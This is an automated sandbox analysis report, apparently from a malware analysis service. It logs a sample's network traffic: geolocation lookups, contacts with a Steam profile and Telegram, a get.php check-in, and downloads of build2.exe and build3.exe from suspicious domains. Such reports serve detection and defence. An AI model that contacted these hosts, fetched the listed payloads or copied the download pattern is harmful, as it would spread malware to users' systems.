Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
sajdfue.com | 189.189.213.86 | |
api.2ip.ua | 104.21.65.24 | |
sdfjhuz.com | 211.168.53.110 | |
t.me | 149.154.167.99 | |
steamcommunity.com | 104.76.78.101 |
- TCP Requests
-
-
192.168.56.101:49178 104.76.78.101:443steamcommunity.com
-
192.168.56.101:49183 149.154.167.99:443t.me
-
192.168.56.101:49184 149.154.167.99:443t.me
-
192.168.56.101:49186 149.154.167.99:443t.me
-
192.168.56.101:49163 172.67.139.220:443api.2ip.ua
-
192.168.56.101:49170 172.67.139.220:443api.2ip.ua
-
192.168.56.101:49171 192.143.159.3:80sajdfue.com
-
192.168.56.101:49173 192.143.159.3:80sajdfue.com
-
192.168.56.101:49172 211.168.53.110:80sdfjhuz.com
-
192.168.56.101:49179 78.46.229.36:443
-
192.168.56.101:49180 78.46.229.36:443
-
192.168.56.101:49181 78.46.229.36:443
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:61953 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.101:53004
-
GET
200
https://api.2ip.ua/geo.json
REQUEST
RESPONSE
BODY
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
HTTP/1.1 200 OK
Date: Thu, 28 Mar 2024 23:05:56 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKIgC9P3bCjnB2kmDa2nhQejY93jL8wGl%2FzggdvGV%2BohgANyzApe%2BB%2FmlLzfXsdljLu7Pfm0kn3I%2BGwpDWOF9QdV2zeQNVP4hdlEotzTjG4XNV8i2wKy5eV%2BdEIQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86bb448a79d231f1-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://api.2ip.ua/geo.json
REQUEST
RESPONSE
BODY
GET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
HTTP/1.1 200 OK
Date: Thu, 28 Mar 2024 23:05:58 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=63072000; preload
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block; report=...
access-control-allow-origin: *
access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uM45wJaW%2BQz39pNAXyr8MxYL4hoN7PQwTPi7iD09X9ReVgQT%2B2%2BtMDM9YtlwgzrFw2KWqv2%2FGMS25QxAMW07oQNnYvcxi9LS2%2B2L5iNEkoydTtdV88p7XC4fYuAz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 86bb449a1e657c8b-LAX
alt-svc: h3=":443"; ma=86400
GET
200
https://steamcommunity.com/profiles/76561199658817715
REQUEST
RESPONSE
BODY
GET /profiles/76561199658817715 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 28 Mar 2024 23:06:01 GMT
Content-Length: 34657
Connection: keep-alive
Set-Cookie: sessionid=5c8021a9ca5917b1f65f60ac; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=KR%7Cf412d3b2c2b6515b2cdce927ad7acf7b; Path=/; Secure; HttpOnly; SameSite=None
GET
200
http://sajdfue.com/test1/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
REQUEST
RESPONSE
BODY
GET /test1/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: sajdfue.com
HTTP/1.1 200 OK
Date: Thu, 28 Mar 2024 23:06:12 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 558
Connection: close
Content-Type: text/html; charset=UTF-8
GET
200
http://sdfjhuz.com/dl/build2.exe
REQUEST
RESPONSE
BODY
GET /dl/build2.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: sdfjhuz.com
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 28 Mar 2024 23:06:00 GMT
Content-Type: application/octet-stream
Content-Length: 283648
Last-Modified: Wed, 27 Mar 2024 17:00:03 GMT
Connection: close
ETag: "66045093-45400"
Accept-Ranges: bytes
GET
200
http://sajdfue.com/files/1/build3.exe
REQUEST
RESPONSE
BODY
GET /files/1/build3.exe HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: sajdfue.com
HTTP/1.1 200 OK
Date: Thu, 28 Mar 2024 23:06:14 GMT
Server: Apache/2.4.37 (Win64) PHP/5.6.40
Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
ETag: "4ae00-6074de5a4a562"
Accept-Ranges: bytes
Content-Length: 306688
Connection: close
Content-Type: application/x-msdownload
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49178 104.76.78.101:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com | 10:20:2b:ee:30:69:cc:b6:ac:5e:47:04:71:ca:b0:75:78:51:58:f5 |
TLSv1 192.168.56.101:49163 172.67.139.220:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=2ip.ua | f8:9c:5f:b5:f0:79:90:56:07:a5:b3:43:29:6b:47:5e:bf:d2:dc:41 |
TLSv1 192.168.56.101:49170 172.67.139.220:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=2ip.ua | f8:9c:5f:b5:f0:79:90:56:07:a5:b3:43:29:6b:47:5e:bf:d2:dc:41 |
Snort Alerts
No Snort Alerts